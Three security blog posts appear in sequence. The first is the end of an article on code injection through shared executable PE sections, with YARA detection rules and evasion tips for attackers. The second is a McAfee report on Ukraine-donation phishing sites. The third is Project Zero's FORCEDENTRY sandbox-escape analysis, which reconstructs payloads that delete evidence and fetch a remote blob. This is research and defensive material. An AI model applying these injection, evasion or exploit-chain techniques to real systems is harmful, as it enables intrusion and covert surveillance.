  3. Changing the protection of memory to executable (EtwTiLogProtectExecVm).
  4. Mapping an executable section (EtwTiLogMapExecView).

Other methods of entering the context of another process typically come with other detection vectors. For example, another method of moving laterally may involve disk-based attacks such as Proxy Dll Injection. The problem with these sort-of attacks is that they often require writing malicious code to disk which is visible to kernel-based defensive solutions.

Since these visible operations are required by known methods of cross-process movement, one must start looking beyond existing methods for staying ahead of telemetry available to defenders.

Discovery

Recently I was investigating the extents you could corrupt a Portable Executable (PE) binary without impacting its usability. For example, could you corrupt a known malicious tool such as Mimikatz to an extent that wouldn't impact its operability but would break the image parsers built into anti-virus software?

Similar to ELF executables in Linux, Windows PE images are made up of "sections". For example, code is typically stored in a section called .text, mutable data can be found in .data, and read-only data is generally in .rdata. How does the operating system know what sections contain code or should be writable? Each section has "characteristics" which defines how they are allocated.

There are over 35 documented characteristics for PE sections. The most common include IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, and IMAGE_SCN_MEM_WRITE which define if a section should be executable, readable, and/or writeable. These only represent a small fraction of the possibilities for PE sections however.

When attempting to corrupt the PE section header, one specific flag caught my eye:

Sharing is Caring: Abusing Shared Sections for Code Injection
"IMAGE_SCN_MEM_SHARED" characteristic

According to Microsoft's documentation, the IMAGE_SCN_MEM_SHARED flag means that "the section can be shared in memory". What does this exactly mean? There isn't much documentation on the use of this flag online, but it turned out that if this flag is enabled, that section's memory is shared across all processes that have the image loaded. For example, if process A and B load a PE image with a section that is "shared" (and writable), any changes in the memory of that section in process A will be reflected in process B.

Some research relevant to the theory we will discuss in this article is DLL shared sections: a ghost of the past by Gynvael Coldwind. In his paper, Coldwind explored the potential vulnerabilities posed by binaries with PE sections that had the IMAGE_SCN_MEM_SHARED characteristic.

Coldwind explained that the risk posed by these PE images "is an old and well-known security problem" with a reference to an article from Microsoft published in 2004 titled Why shared sections are a security hole. The paper only focused on the threat posed by "Read/write shared sections" and "Read/only shared sections" without addressing a third option, "Read/write/execute shared sections".

Exploiting Shared Sections

Although the general risk of shared sections has been known by researchers and Microsoft themselves for quite some time, there has not been significant investigation to the potential abuse of shared sections that are readable, writable, and executable (RWX-S).

There is great offensive potential for RWX-S binaries because if you can cause a remote process to load an RWX-S binary of your choice, you now have an executable memory page in the remote process that can be modified without being visible to kernel-based defensive solutions. To inject code, an attacker could load an RWX-S binary into their process, edit the section with whatever malicious code they want in memory, load the RWX-S binary into the remote process, and the changes in their own process would be reflected in the victim process as well.

The action of loading the RWX-S binary itself would still be visible to defensive solutions, but as we will discuss in a later section, there are plenty of options for legitimate RWX-S binaries that are used outside of a malicious context.

There are a few noteworthy comments about using this technique:

  1. An attacker must be able to load an RWX-S binary into the remote process. This binary does not need to contain any malicious code other than a PE section that is RWX-S.
  2. If the RWX-S binary is x86, LoadLibrary calls inside of an x64 process will fail. x86 binaries can still be manually mapped inside x64 processes by opening the file, creating a section with the attribute SEC_IMAGE, and mapping a view of the section.
  3. RWX-S binaries are not shared across sessions. RWX-S binaries are shared by unprivileged and privileged processes in the same session.
  4. Modifications to shared sections are not written to disk. For example, the buffer returned by both ReadFile and mapping the image with the attribute SEC_COMMIT do not contain any modifications on the shared section. Only when the binary is mapped as SEC_IMAGE will these changes be present. This also means that any modifications to the shared section will not break the authenticode signature on disk.
  5. Unless the used RWX-S binary has its entrypoint inside of the shared executable section, an attacker must be able to cause execution at an arbitrary address in the remote process. This does not require direct process access. For example, SetWindowsHookEx could be used to execute an arbitrary pointer in a module without direct process access.

In the next sections, we will cover practical implementations for this theory and the prevalence of RWX-S host binaries in the wild.

Patching Entrypoint to Gain Execution

In certain cases, the requirement for an attacker to be able to execute an arbitrary pointer in the remote process can be bypassed.

If the RWX-S host binary has its entrypoint located inside of an RWX-S section, then an attacker does not need a special execution method.

Instead, before loading the RWX-S host binary into the remote process, an attacker can patch the memory located at the image's entrypoint to represent any arbitrary shellcode to be executed. When the victim process loads the RWX-S host binary and attempts to execute the entrypoint, the attacker's shellcode will be executed instead.

Finding RWX-S Binaries In-the-Wild

One of the questions that this research attempts to address is "How widespread is the RWX-S threat?". For determining the prevalence of the technique, I used VirusTotal's Retrohunt functionality which allows users to "scan all the files sent to VirusTotal in the past 12 months with ... YARA rules".

For detecting unsigned RWX-S binaries in-the-wild, a custom YARA rule was created that checks for an RWX-S section in the PE image:

import "pe"

rule RWX_S_Search
{
	meta:
		description = "Detects RWX-S binaries."
		author = "Bill Demirkapi"
	condition:
		for any i in (0..pe.number_of_sections - 1): (
			(pe.sections[i].characteristics & pe.SECTION_MEM_READ) and
			(pe.sections[i].characteristics & pe.SECTION_MEM_EXECUTE) and
			(pe.sections[i].characteristics & pe.SECTION_MEM_WRITE) and
			(pe.sections[i].characteristics & pe.SECTION_MEM_SHARED) )
}

All this rule does is enumerate a binaries' PE sections and checks if it is readable, writable, executable, and shared.

When this rule was searched via Retrohunt, over 10,000 unsigned binaries were found (Retrohunt stops searching beyond 10,000 results).

When this rule was searched again with a slight modification to check that the PE image is for the MACHINE_AMD64 machine type, there were only 99 x64 RWX-S binaries.

This suggests that RWX-S binaries for x64 machines have been relatively uncommon for the past 12 months and indicates that defensive solutions may be able to filter for RWX-S binaries without significant noise on protected machines.

In order to detect signed RWX-S binaries, the YARA rule above was slightly modified to contain a check for authenticode signatures.

import "pe"

rule RWX_S_Signed_Search
{
	meta:
		description = "Detects RWX-S signed binaries. This only verifies that the image contains a signature, not that it is valid."
		author = "Bill Demirkapi"
	condition:
		for any i in (0..pe.number_of_sections - 1): (
			(pe.sections[i].characteristics & pe.SECTION_MEM_READ) and
			(pe.sections[i].characteristics & pe.SECTION_MEM_EXECUTE) and
			(pe.sections[i].characteristics & pe.SECTION_MEM_WRITE) and
			(pe.sections[i].characteristics & pe.SECTION_MEM_SHARED) )
		and pe.number_of_signatures > 0
}

Unfortunately with YARA rules, there is not an easy way to determine if a PE image contains an authenticode signature that has a valid certificate that has not expired or was signed with a valid timestamp during the certificate's life. This means that the YARA rule above will contain some false positives of binaries with invalid signatures. Since there were false positives, the rule above did not immediately provide a list of RWX-S binaries that have a valid authenticode signature. To extract signed binaries, a simple Python script was written that downloaded each sample below a detection threshold and verified the signature of each binary.

After this processing, approximately 15 unique binaries with valid authenticode signatures were found. As seen with unsigned binaries, signed RWX-S binaries are not significantly common in-the-wild for the past 12 months. Additionally, only 5 of the 15 unique signed binaries are for x64 machines. It is important to note that while this number may seem low, signed binaries are only a convenience and are certainly not required in most situations.

Abusing Unsigned RWX-S Binaries

Patching Unsigned Binaries

Given that mitigations such as User-Mode Code Integrity have not experienced widespread adoption, patching existing unsigned binaries still remains a viable method.

To abuse RWX-S sections with unsigned binaries, an attacker could:

  1. Find a legitimate host unsigned DLL to patch.
  2. Read the unsigned DLL into memory and patch a section's characteristics to be readable, writable, executable, and shared.
  3. Write this new patched RWX-S host binary somewhere on disk before using it.

Here are a few suggestions for maintaining operational security:

  1. It is recommended that an attacker does not patch an existing binary on disk. For example, if an attacker only modified the section characteristics of an existing binary and wrote this patch to the same path on disk, defensive solutions could detect that an RWX-S patch was applied to that existing file. Therefore, it is recommended that patched binaries be written to a different location on disk.
  2. It is recommended that an attacker add other patches besides just RWX-S. This can be modifying other meaningless properties around the section's characteristics or modifying random parts of the code (it is important that these changes do not appear malicious). This is to make it harder to differentiate when an attacker has specifically applied an RWX-S patch on a binary.

Using Existing Unsigned Binaries

Creating a custom patched binary is not required. For example, using the YARA rule in the previous section, an attacker could use any of the existing unsigned RWX-S binaries that may be used in legitimate applications.

Abusing Signed RWX-S Binaries in the Kernel

Although there were only 15 signed RWX-S binaries discovered in the past 12 months, the fact that they have a valid authenticode signature can be useful during exploitation of processes that may require signed modules.

One interesting signed RWX-S binary that the search revealed was a signed driver. When attempting to test if shared sections are replicated from user-mode to kernel-mode, it was revealed that the memory is not shared, even when the image is mapped and modified by a process in Session 0.

Conclusion

Although the rarity of shared sections presents a unique opportunity for defenders to obtain high-fidelity telemetry, RWX-S binaries still serve as a powerful method that break common assumptions regarding cross-process memory allocation and execution. The primary challenge for defenders around this technique is its prevalence in unsigned code. It may be relatively simple to detect RWX-S binaries, but how do you tell if it is used in a legitimate application?

Scammers are Exploiting Ukraine Donations

1 April 2022 at 21:35

Authored by Vallabh Chole and Oliver Devane

Scammers are very quick at reacting to current events, so they can generate ill-gotten gains. It comes as no surprise that they exploited the current events in Ukraine, and when the Ukrainian Twitter account tweeted Bitcoin and Ethereum wallet addresses for donations we knew that scammers would use this as a lure for their victims.

This blog covers some of the malicious sites and emails McAfee has observed in the past few weeks.

Crypto wallet donation scams

A crypto donation scam occurs when perpetrators create phishing websites and emails that contain cryptocurrency wallets asking for donations. We have observed several new domains being created which perform this malicious activity, such as ukrainehelp[.]world and ukrainethereum[.]com.

Ukrainhelp[.]world

Below is a screenshot of Ukrainehelp[.]world, which is a phishing site asking for crypto donations for UNICEF. The website contains the BBC logo and several crypto wallet addresses.

While investigating this site, we observed that the Ethereum wallet used use was also associated with an older crypto scam site called eth-event20.com. The image below shows the current value of the crypto wallet which is worth $114,000. Interestingly this wallet transfers all its coins to 0xc95eb2aa75260781627e7171c679a490e2240070 which in turn transfers to 0x45fb09468b17d14d2b9952bc9dcb39ee7359e64d. The final wallet currently has 313 ETH which is worth over $850,000. This shows the large sums of money scammers can generate with phishing sites.

Ukrainethereum[.]com

Ukrainethereum[.]com is another crypto scam site, but what makes this one interesting is the features it contains to gain the victim’s confidence in trusting the website such as a fake chatbox and a fake donation verifier.

Fake Chat

The image above shows the chatbox on the left-hand side which displays several messages. At first glance, it would appear as if other users are on the website and talking, but when you reload the site it shows the same messages. This is due to the chat messages being displayed from a list that is used to populate the website with JavaScript code as shown on the right-hand side.  

Fake Donation Verifier 

The site contains a donation checker so the victim can see if their donation was received, as shown below. 

 

  1. The first image on left shows the verification box for donation to check if it is completed or not 
  2. Upon clicking ‘Check’ the victim is shown a message to say the donation was received.  
  3. What occurs, is upon clicking ‘Check’ the JavaScript code changes the website code so that it displays the ‘Thanks!’ message, and no actual check is performed. 

Phishing Email 

The following image shows one of the examples of phish emails we have observed. 

The email is not addressed to anyone specifically as they are mass-mailed to multiple email addresses. The wallet IDs in the email are not associated with the official Ukraine Twitter and are owned by scammers. As you can see in the image above, they are similar as the first 3 characters are the same. This could lead to some users believing it is legitimate. Therefore, it’s important to check that the wallet address is identical.  

Credit Card Information Stealer 

This is the most common type of phishing website. The goal of these sites it entices the victim into entering their credit card and personally identifiable information (PII) data by making them believe that the site being visited is official. This section contains details on one such website we have found using Ukraine donations as a lure.  

Razonforukrain[.]com 

The image below shows the phishing site. The website was used to save the children’s NGO links and images, which made it appear more genuine. You can see that is it asking the victim to enter their credit card and billing information.  

Once the data is entered, and the victim clicks on ‘Donate’, the information will be submitted via the form and will be sent to scammers so they can then use or sell the information. 

We observed that a few days after the website was created, the scammers change the site code so that it became a Mcdonald’s phishing site targeting the Arab Emirates. This was a surprising change in tactics. 

The heatmap below shows the detections McAfee has observed around the world for the malicious sites mentioned in this blog. 

Conclusion 

How to identify a phishing email? 

  • Look for the domain from where you received mail, attackers masquerade it. 
  • Use McAfee Web Advisor as this prevents you from accessing malicious sites 
  • If McAfee Web Advisor is not used, links can be manually checked at https://trustedsource.org/. 
  • Perform a Web Search of any crypto wallet addresses. If the search returns no or a low number of hits it is likely fraudulent. 
  • Check for poor grammar and suspicious logos  
  • For more detailed advice please visit McAfee’s How to recognize and protect yourself from phishing page 

How to identify phishing websites? 

  • Use McAfee Web Advisor as this prevents you from accessing malicious sites 
  • Look at the URL of the website which you are visiting and make sure it is correct. Look for alterations such as logln-paypal.com instead of login.paypal.com 
  • If you are unsure that the website is legitimate. Perform a Web search of the URL. You will find many results If they are genuine. If the search returns no or a low number of hits it is likely fraudulent 
  • Hyperlinks and site addresses that do not match the sender – Hover your mouse over the hyperlink or call-to-action button in the email. Is the address shortened or is it different from what you would expect from the sender? It may be a spoofed address from the 
  • Verify if the URL and Title of the page match. Such as the website, razonforukraine[.]com with a title reading “McDonald’s Delivery” 

For general cyber scam, education click here

McAfee customers are protected against the malicious sites detailed in this blog as they are blocked with McAfee Web Advisor 

 

Type  Value  Product  Detected 
URL – Phishing Sites   ukrainehelp[.]world  McAfee WebAdvisor   Blocked 
URL – Phishing Sites   ukrainethereum[.]com  McAfee WebAdvisor   Blocked 
URL – Phishing Sites   unitedhelpukraine[.]kiev[.]ua/  McAfee WebAdvisor   Blocked 
URL – Phishing Sites   donationukraine[.]io/donate  McAfee WebAdvisor   Blocked 
URL – Phishing Sites   help-ukraine-compaign[.]com/shop  McAfee WebAdvisor   Blocked 
URL – Phishing Sites   ukrainebitcoin[.]online/  McAfee WebAdvisor   Blocked 
URL – Phishing Sites   ukrainedonation[.]org/donate  McAfee WebAdvisor   Blocked 
URL – Phishing Sites   ukrainewar[.]support  McAfee WebAdvisor   Blocked 
URL – Phishing Sites   sendhelptoukraine[.]com  McAfee WebAdvisor   Blocked 
URL – Phishing Sites   worldsupportukraine[.]com  McAfee WebAdvisor   Blocked 
URL – Phishing Sites   paytoukraine[.]space  McAfee WebAdvisor   Blocked 
URL – Phishing Sites   razonforukraine[.]com  McAfee WebAdvisor   Blocked 

 

The post Scammers are Exploiting Ukraine Donations appeared first on McAfee Blog.

FORCEDENTRY: Sandbox Escape

By: Anonymous
31 March 2022 at 16:00

Posted by Ian Beer & Samuel Groß of Google Project Zero

We want to thank Citizen Lab for sharing a sample of the FORCEDENTRY exploit with us, and Apple’s Security Engineering and Architecture (SEAR) group for collaborating with us on the technical analysis. Any editorial opinions reflected below are solely Project Zero’s and do not necessarily reflect those of the organizations we collaborated with during this research.

Late last year we published a writeup of the initial remote code execution stage of FORCEDENTRY, the zero-click iMessage exploit attributed by Citizen Lab to NSO. By sending a .gif iMessage attachment (which was really a PDF) NSO were able to remotely trigger a heap buffer overflow in the ImageIO JBIG2 decoder. They used that vulnerability to bootstrap a powerful weird machine capable of loading the next stage in the infection process: the sandbox escape.

In this post we'll take a look at that sandbox escape. It's notable for using only logic bugs. In fact it's unclear where the features that it uses end and the vulnerabilities which it abuses begin. Both current and upcoming state-of-the-art mitigations such as Pointer Authentication and Memory Tagging have no impact at all on this sandbox escape.

An observation

During our initial analysis of the .gif file Samuel noticed that rendering the image appeared to leak memory. Running the heap tool after releasing all the associated resources gave the following output:

$ heap $pid

------------------------------------------------------------

All zones: 4631 nodes (826336 bytes)        

             

   COUNT    BYTES     AVG   CLASS_NAME   TYPE   BINARY          

   =====    =====     ===   ==========   ====   ======        

    1969   469120   238.3   non-object

     825    26400    32.0   JBIG2Bitmap  C++   CoreGraphics

heap was able to determine that the leaked memory contained JBIG2Bitmap objects.

Using the -address option we could find all the individual leaked bitmap objects:

$ heap -address JBIG2Bitmap $pid

and dump them out to files. One of those objects was quite unlike the others:

$ hexdump -C dumpXX.bin | head

00000000  62 70 6c 69 73 74 30 30  |bplist00|

...

00000018        24 76 65 72 73 69  |  $versi|

00000020  6f 6e 59 24 61 72 63 68  |onY$arch|

00000028  69 76 65 72 58 24 6f 62  |iverX$ob|

00000030  6a 65 63 74 73 54 24 74  |jectsT$t|

00000038  6f 70                    |op      |

00000040        4e 53 4b 65 79 65  |  NSKeye|

00000048  64 41 72 63 68 69 76 65  |dArchive|

It's clearly a serialized NSKeyedArchiver. Definitely not what you'd expect to see in a JBIG2Bitmap object. Running strings we see plenty of interesting things (noting that the URL below is redacted):

Objective-C class and selector names:

NSFunctionExpression

NSConstantValueExpression

NSConstantValue

expressionValueWithObject:context:

filteredArrayUsingPredicate:

_web_removeFileOnlyAtPath:

context:evaluateMobileSubscriberIdentity:

performSelectorOnMainThread:withObject:waitUntilDone:

...

The name of the file which delivered the exploit:

XXX.gif

Filesystems paths:

/tmp/com.apple.messages

/System/Library/PrivateFrameworks/SlideshowKit.framework/Frameworks/OpusFoundation.framework

a URL:

https://XXX.cloudfront.net/YYY/ZZZ/megalodon?AAA

Using plutil we can convert the bplist00 binary format to XML. Performing some post-processing and cleanup we can see that the top-level object in the NSKeyedArchiver is a serialized NSFunctionExpression object.

NSExpression NSPredicate NSExpression

If you've ever used Core Data or tried to filter a Objective-C collection you might have come across NSPredicates. According to Apple's public documentation they are used "to define logical conditions for constraining a search for a fetch or for in-memory filtering".

For example, in Objective-C you could filter an NSArray object like this:

  NSArray* names = @[@"one", @"two", @"three"];

  NSPredicate* pred;

  pred = [NSPredicate predicateWithFormat:

            @"SELF beginswith[c] 't'"];

  NSLog(@"%@", [names filteredArrayUsingPredicate:pred]);

The predicate is "SELF beginswith[c] 't'". This prints an NSArray containing only "two" and "three".

[NSPredicate predicateWithFormat] builds a predicate object by parsing a small query language, a little like an SQL query.

NSPredicates can be built up from NSExpressions, connected by NSComparisonPredicates (like less-than, greater-than and so on.)

NSExpressions themselves can be fairly complex, containing aggregate expressions (like "IN" and "CONTAINS"), subqueries, set expressions, and, most interestingly, function expressions.

Prior to 2007 (in OS X 10.4 and below) function expressions were limited to just the following five extra built-in methods: sum, count, min, max, and average.

But starting in OS X 10.5 (which would also be around the launch of iOS in 2007) NSFunctionExpressions were extended to allow arbitrary method invocations with the FUNCTION keyword:

  "FUNCTION('abc', 'stringByAppendingString', 'def')" => @"abcdef"

FUNCTION takes a target object, a selector and an optional list of arguments then invokes the selector on the object, passing the arguments. In this case it will allocate an NSString object @"abc" then invoke the stringByAppendingString: selector passing the NSString @"def", which will evaluate to the NSString @"abcdef".

In addition to the FUNCTION keyword there's CAST which allows full reflection-based access to all Objective-C types (as opposed to just being able to invoke selectors on literal strings and integers):

  "FUNCTION(CAST('NSFileManager', 'Class'), 'defaultManager')"

Here we can get access to the NSFileManager class and call the defaultManager selector to get a reference to a process's shared file manager instance.

These keywords exist in the string representation of NSPredicates and NSExpressions. Parsing those strings involves creating a graph of NSExpression objects, NSPredicate objects and their subclasses like NSFunctionExpression. It's a serialized version of such a graph which is present in the JBIG2 bitmap.

NSPredicates using the FUNCTION keyword are effectively Objective-C scripts. With some tricks it's possible to build nested function calls which can do almost anything you could do in procedural Objective-C. Figuring out some of those tricks was the key to the 2019 Real World CTF DezhouInstrumenz challenge, which would evaluate an attacker supplied NSExpression format string. The writeup by the challenge author is a great introduction to these ideas and I'd strongly recommend reading that now if you haven't. The rest of this post builds on the tricks described in that post.

A tale of two parts

The only job of the JBIG2 logic gate machine described in the previous blog post is to cause the deserialization and evaluation of an embedded NSFunctionExpression. No attempt is made to get native code execution, ROP, JOP or any similar technique.

Prior to iOS 14.5 the isa field of an Objective-C object was not protected by Pointer Authentication Codes (PAC), so the JBIG2 machine builds a fake Objective-C object with a fake isa such that the invocation of the dealloc selector causes the deserialization and evaluation of the NSFunctionExpression. This is very similar to the technique used by Samuel in the 2020 SLOP post.

This NSFunctionExpression has two purposes:

Firstly, it allocates and leaks an ASMKeepAlive object then tries to cover its tracks by finding and deleting the .gif file which delivered the exploit.

Secondly, it builds a payload NSPredicate object then triggers a logic bug to get that NSPredicate object evaluated in the CommCenter process, reachable from the IMTranscoderAgent sandbox via the com.apple.commcenter.xpc NSXPC service.

Let's look at those two parts separately:

Covering tracks

The outer level NSFunctionExpression calls performSelectorOnMainThread:withObject:waitUntilDone which in turn calls makeObjectsPerformSelector:@"expressionValueWithObject:context:" on an NSArray of four NSFunctionExpressions. This allows the four independent NSFunctionExpressions to be evaluated sequentially.

With some manual cleanup we can recover pseudo-Objective-C versions of the serialized NSFunctionExpressions.

The first one does this:

[[AMSKeepAlive alloc] initWithName:"KA"]

This allocates and then leaks an AppleMediaServices KeepAlive object. The exact purpose of this is unclear.

The second entry does this:

[[NSFileManager defaultManager] _web_removeFileOnlyAtPath:

  [@"/tmp/com.apple.messages" stringByAppendingPathComponent:

    [ [ [ [

            [NSFileManager defaultManager]

            enumeratorAtPath: @"/tmp/com.apple.messages"

          ]

          allObjects

        ]

        filteredArrayUsingPredicate:

          [

            [NSPredicate predicateWithFormat:

              [

                [@"SELF ENDSWITH '"

                  stringByAppendingString: "XXX.gif"]

                stringByAppendingString: "'"

      ]   ] ] ]

      firstObject

    ]

  ]

]

Reading these single expression NSFunctionExpressions is a little tricky; breaking that down into a more procedural form it's equivalent to this:

NSFileManager* fm = [NSFileManager defaultManager];

NSDirectoryEnumerator* dir_enum;

dir_enum = [fm enumeratorAtPath: @"/tmp/com.apple.messages"]

NSArray* allTmpFiles = [dir_enum allObjects];

NSString* filter;

filter = ["@"SELF ENDSWITH '" stringByAppendingString: "XXX.gif"];

filter = [filter stringByAppendingString: "'"];

NSPredicate* pred;

pred = [NSPredicate predicateWithFormat: filter]

NSArray* matches;

matches = [allTmpFiles filteredArrayUsingPredicate: pred];

NSString* gif_subpath = [matches firstObject];

NSString* root = @"/tmp/com.apple.messages";

NSString* full_path;

full_path = [root stringByAppendingPathComponent: gifSubpath];

[fm _web_removeFileOnlyAtPath: full_path];

This finds the XXX.gif file used to deliver the exploit which iMessage has stored somewhere under the /tmp/com.apple.messages folder and deletes it.

The other two NSFunctionExpressions build a payload and then trigger its evaluation in CommCenter. For that we need to look at NSXPC.

NSXPC

NSXPC is a semi-transparent remote-procedure-call mechanism for Objective-C. It allows the instantiation of proxy objects in one process which transparently forward method calls to the "real" object in another process:

https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html

I say NSXPC is only semi-transparent because it does enforce some restrictions on what objects are allowed to traverse process boundaries. Any object "exported" via NSXPC must also define a protocol which designates which methods can be invoked and the allowable types for each argument. The NSXPC programming guide further explains the extra handling required for methods which require collections and other edge cases.

The low-level serialization used by NSXPC is the same explored by Natalie Silvanovich in her 2019 blog post looking at the fully-remote attack surface of the iPhone. An important observation in that post was that subclasses of classes with any level of inheritance are also allowed, as is always the case with NSKeyedUnarchiver deserialization.

This means that any protocol object which declares a particular type for a field will also, by design, accept any subclass of that type.

The logical extreme of this would be that a protocol which declared an argument type of NSObject would allow any subclass, which is the vast majority of all Objective-C classes.

Grep to the rescue

This is fairly easy to analyze automatically. Protocols are defined statically so we can just find them and check each one. Tools like RuntimeBrowser and classdump can parse the static protocol definitions and output human-readable source code. Grepping the output of RuntimeBrowser like this is sufficient to find dozens of cases of NSObject pointers in Objective-C protocols:

  $ egrep -Rn "\(NSObject \*\)arg" *

Not all the results are necessarily exposed via NSXPC, but some clearly are, including the following two matches in CoreTelephony.framework:

Frameworks/CoreTelephony.framework/\

CTXPCServiceSubscriberInterface-Protocol.h:39:

-(void)evaluateMobileSubscriberIdentity:

        (CTXPCServiceSubscriptionContext *)arg1

       identity:(NSObject *)arg2

       completion:(void (^)(NSError *))arg3;

Frameworks/CoreTelephony.framework/\

CTXPCServiceCarrierBundleInterface-Protocol.h:13:

-(void)setWiFiCallingSettingPreferences:

         (CTXPCServiceSubscriptionContext *)arg1

       key:(NSString *)arg2

       value:(NSObject *)arg3

       completion:(void (^)(NSError *))arg4;

evaluateMobileSubscriberIdentity string appears in the list of selector-like strings we first saw when running strings on the bplist00. Indeed, looking at the parsed and beautified NSFunctionExpression we see it doing this:

[ [ [CoreTelephonyClient alloc] init]

  context:X

  evaluateMobileSubscriberIdentity:Y]

This is a wrapper around the lower-level NSXPC code and the argument passed as Y above to the CoreTelephonyClient method corresponds to the identity:(NSObject *)arg2 argument passed via NSXPC to CommCenter (which is the process that hosts com.apple.commcenter.xpc, the NSXPC service underlying the CoreTelephonyClient). Since the parameter is explicitly named as NSObject* we can in fact pass any subclass of NSObject*, including an NSPredicate! Game over?

Parsing vs Evaluation

It's not quite that easy. The DezhouInstrumentz writeup discusses this attack surface and notes that there's an extra, specific mitigation. When an NSPredicate is deserialized by its initWithCoder: implementation it sets a flag which disables evaluation of the predicate until the allowEvaluation method is called.

So whilst you certainly can pass an NSPredicate* as the identity argument across NSXPC and get it deserialized in CommCenter, the implementation of evaluateMobileSubscriberIdentity: in CommCenter is definitely not going to call allowEvaluation:  to make the predicate safe for evaluation then evaluateWithObject: and then evaluate it.

Old techniques, new tricks

From the exploit we can see that they in fact pass an NSArray with two elements:

[0] = AVSpeechSynthesisVoice

[1] = PTSection {rows = NSArray { [0] = PTRow() }

The first element is an AVSpeechSynthesisVoice object and the second is a PTSection containing a single PTRow. Why?

PTSection and PTRow are both defined in the PrototypeTools private framework. PrototypeTools isn't loaded in the CommCenter target process. Let's look at what happens when an AVSpeechSynthesisVoice is deserialized:

Finding a voice

AVSpeechSynthesisVoice is implemented in AVFAudio.framework, which is loaded in CommCenter:

$ sudo vmmap `pgrep CommCenter` | grep AVFAudio

__TEXT  7ffa22c4c000-7ffa22d44000 r-x/r-x SM=COW \

/System/Library/Frameworks/AVFAudio.framework/Versions/A/AVFAudio

Assuming that this was the first time that an AVSpeechSynthesisVoice object was created inside CommCenter (which is quite likely) the Objective-C runtime will call the initialize method on the AVSpeechSynthesisVoice class before instantiating the first instance.

[AVSpeechSynthesisVoice initialize] has a dispatch_once block with the following code:

NSBundle* bundle;

bundle = [NSBundle bundleWithPath:

                     @"/System/Library/AccessibilityBundles/\

                         AXSpeechImplementation.bundle"];

if (![bundle isLoaded]) {

    NSError err;

    [bundle loadAndReturnError:&err]

}

So sending a serialized AVSpeechSynthesisVoice object will cause CommCenter to load the /System/Library/AccessibilityBundles/AXSpeechImplementation.bundle library. With some scripting using otool -L to list dependencies we can  find the following dependency chain from AXSpeechImplementation.bundle to PrototypeTools.framework:

['/System/Library/AccessibilityBundles/\

    AXSpeechImplementation.bundle/AXSpeechImplementation',

 '/System/Library/AccessibilityBundles/\

    AXSpeechImplementation.bundle/AXSpeechImplementation',

 '/System/Library/PrivateFrameworks/\

    AccessibilityUtilities.framework/AccessibilityUtilities',

 '/System/Library/PrivateFrameworks/\

    AccessibilitySharedSupport.framework/AccessibilitySharedSupport',

'/System/Library/PrivateFrameworks/Sharing.framework/Sharing',

'/System/Library/PrivateFrameworks/\

    PrototypeTools.framework/PrototypeTools']

This explains how the deserialization of a PTSection will succeed. But what's so special about PTSections and PTRows?

Predicated Sections

[PTRow initwithcoder:] contains the following snippet:

  self->condition = [coder decodeObjectOfClass:NSPredicate

                           forKey:@"condition"]

  [self->condition allowEvaluation]

This will deserialize an NSPredicate object, assign it to the PTRow member variable condition and call allowEvaluation. This is meant to indicate that the deserializing code considers this predicate safe, but there's no attempt to perform any validation on the predicate contents here. They then need one more trick to find a path to which will additionally evaluate the PTRow's condition predicate.

Here's a snippet from [PTSection initWithCoder:]:

NSSet* allowed = [NSSet setWithObjects: @[PTRow]]

id* rows = [coder decodeObjectOfClasses:allowed forKey:@"rows"]

[self initWithRows:rows]

This deserializes an array of PTRows and passes them to [PTSection initWithRows] which assigns a copy of the array of PTRows to PTSection->rows then calls [self _reloadEnabledRows] which in turn passes each row to [self _shouldEnableRow:]

_shouldEnableRow:row {

  if (row->condition) {

    return [row->condition evaluateWithObject: self->settings]

  }

}

And thus, by sending a PTSection containing a single PTRow with an attached condition NSPredicate they can cause the evaluation of an arbitrary NSPredicate, effectively equivalent to arbitrary code execution in the context of CommCenter.

Payload 2

The NSPredicate attached to the PTRow uses a similar trick to the first payload to cause the evaluation of six independent NSFunctionExpressions, but this time in the context of the CommCenter process. They're presented here in pseudo Objective-C:

Expression 1

[  [CaliCalendarAnonymizer sharedAnonymizedStrings]

   setObject:

     @[[NSURLComponents

         componentsWithString:

         @"https://cloudfront.net/XXX/XXX/XXX?aaaa"], '0']

   forKey: @"0"

]

The use of [CaliCalendarAnonymizer sharedAnonymizedStrings] is a trick to enable the array of independent NSFunctionExpressions to have "local variables". In this first case they create an NSURLComponents object which is used to build parameterised URLs. This URL builder is then stored in the global dictionary returned by [CaliCalendarAnonymizer sharedAnonymizedStrings] under the key "0".

Expression 2

[[NSBundle

  bundleWithPath:@"/System/Library/PrivateFrameworks/\

     SlideshowKit.framework/Frameworks/OpusFoundation.framework"

 ] load]

This causes the OpusFoundation library to be loaded. The exact reason for this is unclear, though the dependency graph of OpusFoundation does include AuthKit which is used by the next NSFunctionExpression. It's possible that this payload is generic and might also be expected to work when evaluated in processes where AuthKit isn't loaded.

Expression 3

[ [ [CaliCalendarAnonymizer sharedAnonymizedStrings]

    objectForKey:@"0" ]

  setQueryItems:

    [ [ [NSArray arrayWithObject:

                 [NSURLQueryItem

                    queryItemWithName: @"m"

                    value:[AKDevice _hardwareModel] ]

                                 ] arrayByAddingObject:

                 [NSURLQueryItem

                    queryItemWithName: @"v"

                    value:[AKDevice _buildNumber] ]

                                 ] arrayByAddingObject:

                 [NSURLQueryItem

                    queryItemWithName: @"u"

                    value:[NSString randomString]]

]

This grabs a reference to the NSURLComponents object stored under the "0" key in the global sharedAnonymizedStrings dictionary then parameterizes the HTTP query string with three values:

  [AKDevice _hardwareModel] returns a string like "iPhone12,3" which determines the exact device model.

  [AKDevice _buildNumber] returns a string like "18A8395" which in combination with the device model allows determining the exact firmware image running on the device.

  [NSString randomString] returns a decimal string representation of a 32-bit random integer like "394681493".

Expression 4

[ [CaliCalendarAnonymizer sharedAnonymizedString]

  setObject:

    [NSPropertyListSerialization

      propertyListWithData:

        [[[NSData

             dataWithContentsOfURL:

               [[[CaliCalendarAnonymizer sharedAnonymizedStrings]

                 objectForKey:@"0"] URL]

          ] AES128DecryptWithPassword:NSData(XXXX)

         ]  decompressedDataUsingAlgorithm:3 error:]

       options: Class(NSConstantValueExpression)

      format: Class(NSConstantValueExpression)

      errors:Class(NSConstantValueExpression)

  ]

  forKey:@"1"

]

The innermost reference to sharedAnonymizedStrings here grabs the NSURLComponents object and builds the full url from the query string parameters set last earlier. That url is passed to [NSData dataWithContentsOfURL:] to fetch a data blob from a remote server.

